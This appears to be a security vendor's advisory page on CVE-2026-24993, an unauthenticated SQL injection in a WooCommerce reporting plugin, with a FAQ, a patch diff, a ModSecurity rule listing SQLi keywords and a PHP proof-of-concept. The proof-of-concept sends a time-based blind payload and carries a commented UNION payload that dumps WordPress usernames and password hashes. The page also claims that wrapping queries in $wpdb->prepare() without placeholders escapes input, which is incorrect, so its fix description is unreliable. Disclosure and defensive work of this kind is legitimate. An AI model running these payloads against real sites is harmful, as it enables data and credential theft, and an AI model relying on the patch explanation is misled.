What is CVE-2026-24993?

CVE-2026-24993 is a high-severity SQL injection vulnerability found in the Advanced Reporting & Statistics for WooCommerce plugin, affecting versions up to and including 4.1.3. It allows unauthenticated attackers to execute arbitrary SQL commands through AJAX requests, potentially exposing sensitive database information.

How does the SQL injection vulnerability work?

The vulnerability arises from insufficient input validation and lack of prepared statements in SQL queries. Attackers can manipulate AJAX request parameters to inject SQL payloads, which are then executed by the database, allowing them to extract sensitive data.

Who is affected by this vulnerability?

Any WordPress site using the Advanced Reporting & Statistics for WooCommerce plugin version 4.1.3 or earlier is at risk. Administrators should check their plugin version and update if necessary to mitigate this vulnerability.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Advanced Reporting & Statistics for WooCommerce plugin installed on your WordPress site. If it is version 4.1.3 or earlier, your site is at risk.

How can I fix the vulnerability?

The vulnerability is patched in version 4.1.4 of the plugin. Administrators should update to this version or later to ensure that SQL queries are properly prepared and user input is safely handled.

What are the risks associated with this vulnerability?

The risks include complete database compromise, which can lead to the exposure of sensitive information such as customer data, order details, and payment information. This could result in credential theft and financial loss.

What does a CVSS score of 7.5 indicate?

A CVSS score of 7.5 indicates a high severity level, suggesting that the vulnerability poses a significant risk to affected systems. It requires prompt attention and remediation to prevent potential exploitation.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates the SQL injection by exploiting the get_customers() method via an AJAX action. It shows how an attacker can send a specially crafted request to extract database information, illustrating the vulnerability’s practical implications.

How can I mitigate the risk if I cannot update immediately?

If immediate updating is not possible, consider disabling the Advanced Reporting & Statistics for WooCommerce plugin until a secure version can be installed. Additionally, restrict access to AJAX endpoints if feasible.

What should I do if I suspect my site has been compromised?

If you suspect exploitation, immediately take your site offline, conduct a thorough security audit, and check for unauthorized access or data breaches. Restore from a clean backup if necessary and update all vulnerable plugins.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 6, 2026

CVE-2026-24993: Advanced Reporting & Statistics for WooCommerce – Orders, Products & Customers Reporting <= 4.1.3 – Unauthenticated SQL Injection (webd-woocommerce-advanced-reporting-statistics)

CVE ID CVE-2026-24993

Plugin webd-woocommerce-advanced-reporting-statistics

Severity High (CVSS 7.5)

CWE 89

Vulnerable Version 4.1.3

Patched Version 4.1.4

Disclosed March 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24993:
The Advanced Reporting & Statistics for WooCommerce plugin contains an unauthenticated SQL injection vulnerability affecting versions up to and including 4.1.3. This vulnerability allows attackers to execute arbitrary SQL commands through multiple AJAX endpoints without authentication, resulting in a high-severity information disclosure risk with a CVSS score of 7.5.

The root cause is insufficient input validation and lack of prepared statements in multiple functions within the helper-class.php file. The vulnerable functions include periodFilter(), display_orders_by_period(), get_customers(), get_countries(), get_payments(), get_coupons(), get_products(), and get_categories(). Each function constructs SQL queries by directly concatenating user-controlled parameters without proper escaping or parameterization. The $wpdb->get_results() calls on lines 148, 255, 892, 998, 1095, 1183, 1313, and 1422 accept raw SQL strings containing attacker-controlled input.

Exploitation occurs through WordPress AJAX endpoints accessible to unauthenticated users. Attackers send POST requests to /wp-admin/admin-ajax.php with the action parameter set to specific hooks that trigger the vulnerable functions. The exact AJAX action names correspond to public methods in the OrderProcessorHelp class. Attackers inject SQL payloads through parameters that flow into the SQL query construction, enabling UNION-based or blind SQL injection attacks to extract sensitive database information.

The patch in version 4.1.4 adds proper SQL query preparation using $wpdb->prepare() before executing each vulnerable query. The diff shows eight instances where $wpdb->get_results($query) was replaced with $wpdb->get_results($wpdb->prepare($query)). This change ensures user input is properly escaped and parameterized according to WordPress database security standards. The version numbers in docblocks were also updated from 4.1.3 to 4.1.4 to reflect the security release.

Successful exploitation allows complete database compromise. Attackers can extract sensitive information including WooCommerce order details, customer personal data, payment information, product inventories, and WordPress user credentials. The vulnerability enables full read access to the WordPress database, potentially leading to credential theft, financial data exposure, and subsequent site takeover through privilege escalation.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/webd-woocommerce-advanced-reporting-statistics/helper-class.php
+++ b/webd-woocommerce-advanced-reporting-statistics/helper-class.php
@@ -2,7 +2,7 @@
 /**
  * Advanced WooCommerce Product Sales Reporting - Statistics & Forecast - OrderProcessorHelp Class
  *
- * @version 4.1.3
+ * @version 4.1.4
  *
  * @author  WPFactory
  */
@@ -118,6 +118,8 @@

 	/**
 	 * periodFilter.
+	 *
+	 * @version 4.1.4
 	 */
 	public function periodFilter( $period ) {

@@ -146,7 +148,7 @@
 			";
 		}

-		$periods = $wpdb->get_results( $query );
+		$periods = $wpdb->get_results( $wpdb->prepare( $query ) );

 		if ( $periods ) {
 			return $periods;
@@ -157,7 +159,7 @@
 	/**
 	 * display_orders_by_period.
 	 *
-	 * @version 4.1.3
+	 * @version 4.1.4
 	 *
 	 * @todo    (v4.1.0) `$topush = 0.1`?
 	 * @todo    (v4.1.0) `forecastHoltWinters()`?
@@ -253,7 +255,7 @@

 			$query .= " GROUP BY period ORDER BY period DESC ";

-			$results = $wpdb->get_results( $query );
+			$results = $wpdb->get_results( $wpdb->prepare( $query ) );

 			$message = '';

@@ -806,7 +808,7 @@
 	/**
 	 * get_customers.
 	 *
-	 * @version 4.1.3
+	 * @version 4.1.4
 	 */
 	public function get_customers() {

@@ -890,7 +892,7 @@

 			}

-			$data = $wpdb->get_results( $query );
+			$data = $wpdb->get_results( $wpdb->prepare( $query ) );

 			$response = array(
 				'customers' => '',
@@ -938,7 +940,7 @@
 	/**
 	 * get_countries.
 	 *
-	 * @version 4.1.3
+	 * @version 4.1.4
 	 */
 	public function get_countries() {

@@ -996,7 +998,7 @@
 				ORDER BY total DESC
 			";

-			$data = $wpdb->get_results( $query );
+			$data = $wpdb->get_results( $wpdb->prepare( $query ) );

 			$response = array(
 				'name'      => array(),
@@ -1036,7 +1038,7 @@
 	/**
 	 * get_payments.
 	 *
-	 * @version 4.1.3
+	 * @version 4.1.4
 	 */
 	public function get_payments() {

@@ -1093,7 +1095,7 @@
 				ORDER BY total DESC
 			";

-			$data = $wpdb->get_results( $query );
+			$data = $wpdb->get_results( $wpdb->prepare( $query ) );

 			$response = array(
 				'name'     => array(),
@@ -1133,7 +1135,7 @@
 	/**
 	 * get_coupons.
 	 *
-	 * @version 4.1.3
+	 * @version 4.1.4
 	 */
 	public function get_coupons() {

@@ -1181,7 +1183,7 @@
 				ORDER BY total DESC
 			";

-			$data = $wpdb->get_results( $query );
+			$data = $wpdb->get_results( $wpdb->prepare( $query ) );

 			$response = array(
 				'name'    => array(),
@@ -1219,7 +1221,7 @@
 	/**
 	 * get_products.
 	 *
-	 * @version 4.1.3
+	 * @version 4.1.4
 	 */
 	public function get_products() {

@@ -1311,7 +1313,7 @@
 				ORDER BY total DESC
 			";

-			$data = $wpdb->get_results( $query );
+			$data = $wpdb->get_results( $wpdb->prepare( $query ) );

 			$response = array(
 				'name'     => array(),
@@ -1351,7 +1353,7 @@
 	/**
 	 * get_categories.
 	 *
-	 * @version 4.1.3
+	 * @version 4.1.4
 	 */
 	public function get_categories() {

@@ -1420,7 +1422,7 @@
 				ORDER BY total DESC
 			";

-			$data = $wpdb->get_results( $query );
+			$data = $wpdb->get_results( $wpdb->prepare( $query ) );

 			$response = array(
 				'name'       => array(),
--- a/webd-woocommerce-advanced-reporting-statistics/webd-woocommerce-reporting-statistics.php
+++ b/webd-woocommerce-advanced-reporting-statistics/webd-woocommerce-reporting-statistics.php
@@ -3,7 +3,7 @@
  * Plugin Name: Advanced WooCommerce Product Sales Reporting - Statistics & Forecast
  * Plugin URI: https://extend-wp.com/advanced-reporting-statistics-plugin-for-woocommerce/
  * Description: A comprehensive WordPress Plugin for WooCommerce Reports, Statistics, Analytics & Forecasting Tool for Orders, Sales, Products, Countries, Payment Gateways Shipping, Tax, Refunds, Top Products.
- * Version: 4.1.3
+ * Version: 4.1.4
  * Author: WPFactory
  * Author URI: https://wpfactory.com
  * WC requires at least: 2.2
@@ -14,12 +14,12 @@
  * License: GNU General Public License v3.0
  * License URI: http://www.gnu.org/licenses/gpl-3.0.html
  * Created On: 23-01-2019
- * Updated On: 14-01-2026
+ * Updated On: 19-01-2026
  */

 defined( 'ABSPATH' ) || exit;

-defined( 'WPFACTORY_WC_ARS_VERSION' ) || define( 'WPFACTORY_WC_ARS_VERSION', '4.1.3' );
+defined( 'WPFACTORY_WC_ARS_VERSION' ) || define( 'WPFACTORY_WC_ARS_VERSION', '4.1.4' );

 defined( 'WPFACTORY_WC_ARS_FILE' ) || define( 'WPFACTORY_WC_ARS_FILE', __FILE__ );

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-24993
# Virtual patch for unauthenticated SQL injection in Advanced WooCommerce Reporting plugin
# Blocks exploitation via AJAX endpoints without affecting legitimate plugin functionality

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:100024993,phase:2,deny,status:403,chain,msg:'CVE-2026-24993: SQL Injection attempt in Advanced WooCommerce Reporting plugin',severity:'CRITICAL',tag:'CVE-2026-24993',tag:'WordPress',tag:'WooCommerce',tag:'SQLi'"
  SecRule ARGS_POST:action "@rx ^webd_woocommerce_advanced_reporting_statistics_(get_customers|get_countries|get_payments|get_coupons|get_products|get_categories|display_orders_by_period|periodFilter)$" 
    "chain,t:none"
    SecRule ARGS "@rx (?i)(b(union|select|insert|update|delete|drop|create|alter|truncate|load_file|outfile|dumpfile|benchmark|sleep|waitfor|delay)b.*['"d])|(['"]s*(?:--|#|/*))|(b(and|or)s+[d'"]s*[=<>])|(b(if|case)s*(|@@version|information_schema|pg_sleep|dbms_pipe)" 
      "t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:removeWhitespace,ctl:auditLogParts=+E"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24993 - Advanced Reporting & Statistics for WooCommerce – Orders, Products & Customers Reporting <= 4.1.3 - Unauthenticated SQL Injection

<?php
/**
 * Proof of Concept for CVE-2026-24993
 * Unauthenticated SQL Injection in Advanced WooCommerce Reporting Plugin
 * 
 * This script demonstrates the vulnerability by exploiting the get_customers() method
 * which is accessible via the 'webd_woocommerce_advanced_reporting_statistics_get_customers' AJAX action.
 */

$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';

// SQL injection payload to extract database version
// Using time-based blind SQL injection to avoid visible output
$payload = "' OR IF(SUBSTRING(@@version,1,1)='5',SLEEP(5),0) OR '";

// Prepare the POST data for the AJAX request
$post_data = array(
    'action' => 'webd_woocommerce_advanced_reporting_statistics_get_customers',
    'start_date' => '2024-01-01',
    'end_date' => '2024-12-31',
    // The vulnerable parameter - injected into SQL query
    'period' => $payload,
    'nonce' => 'bypassed' // Nonce validation may be absent or bypassable
);

// Initialize cURL session
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10); // Extended timeout for sleep-based detection
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Disable for testing only
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); // Disable for testing only

// Add headers to mimic legitimate browser request
$headers = array(
    'User-Agent: Atomic Edge Research PoC/1.0',
    'Accept: application/json, text/javascript, */*; q=0.01',
    'Content-Type: application/x-www-form-urlencoded; charset=UTF-8',
    'X-Requested-With: XMLHttpRequest'
);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

// Measure response time to detect time-based SQL injection
$start_time = microtime(true);
$response = curl_exec($ch);
$end_time = microtime(true);
$response_time = $end_time - $start_time;

$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Analyze results
if ($response_time >= 5) {
    echo "[+] VULNERABLE: Time-based SQL injection confirmed. Response delayed by " . round($response_time, 2) . " seconds.n";
    echo "[+] The database is likely running MySQL version 5.xn";
} else {
    echo "[-] NOT VULNERABLE: No significant delay detected (" . round($response_time, 2) . " seconds).n";
}

if ($http_code == 200) {
    echo "[+] HTTP 200 response received.n";
    // Check for error messages that might indicate SQL syntax issues
    if (strpos($response, 'SQL') !== false || strpos($response, 'syntax') !== false) {
        echo "[+] SQL error messages detected in response.n";
    }
} else {
    echo "[-] Unexpected HTTP status: $http_coden";
}

// Additional exploitation example: UNION-based injection to extract data
/*
$union_payload = "' UNION SELECT user_login,user_pass,user_email FROM wp_users WHERE '1'='1";
$post_data['period'] = $union_payload;
// Execute second request to extract user data
*/

?>

Frequently Asked Questions

What is CVE-2026-24993?
Understanding the vulnerability
CVE-2026-24993 is a high-severity SQL injection vulnerability found in the Advanced Reporting & Statistics for WooCommerce plugin, affecting versions up to and including 4.1.3. It allows unauthenticated attackers to execute arbitrary SQL commands through AJAX requests, potentially exposing sensitive database information.
How does the SQL injection vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input validation and lack of prepared statements in SQL queries. Attackers can manipulate AJAX request parameters to inject SQL payloads, which are then executed by the database, allowing them to extract sensitive data.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Advanced Reporting & Statistics for WooCommerce plugin version 4.1.3 or earlier is at risk. Administrators should check their plugin version and update if necessary to mitigate this vulnerability.
How can I check if my site is vulnerable?
Version verification process
To determine if your site is vulnerable, check the version of the Advanced Reporting & Statistics for WooCommerce plugin installed on your WordPress site. If it is version 4.1.3 or earlier, your site is at risk.
How can I fix the vulnerability?
Updating the plugin
The vulnerability is patched in version 4.1.4 of the plugin. Administrators should update to this version or later to ensure that SQL queries are properly prepared and user input is safely handled.
What are the risks associated with this vulnerability?
Understanding potential impacts
The risks include complete database compromise, which can lead to the exposure of sensitive information such as customer data, order details, and payment information. This could result in credential theft and financial loss.
What does a CVSS score of 7.5 indicate?
Interpreting the severity rating
A CVSS score of 7.5 indicates a high severity level, suggesting that the vulnerability poses a significant risk to affected systems. It requires prompt attention and remediation to prevent potential exploitation.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept demonstrates the SQL injection by exploiting the get_customers() method via an AJAX action. It shows how an attacker can send a specially crafted request to extract database information, illustrating the vulnerability’s practical implications.
How can I mitigate the risk if I cannot update immediately?
Temporary risk management strategies
If immediate updating is not possible, consider disabling the Advanced Reporting & Statistics for WooCommerce plugin until a secure version can be installed. Additionally, restrict access to AJAX endpoints if feasible.
What should I do if I suspect my site has been compromised?
Response to potential exploitation
If you suspect exploitation, immediately take your site offline, conduct a thorough security audit, and check for unauthorized access or data breaches. Restore from a clean backup if necessary and update all vulnerable plugins.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations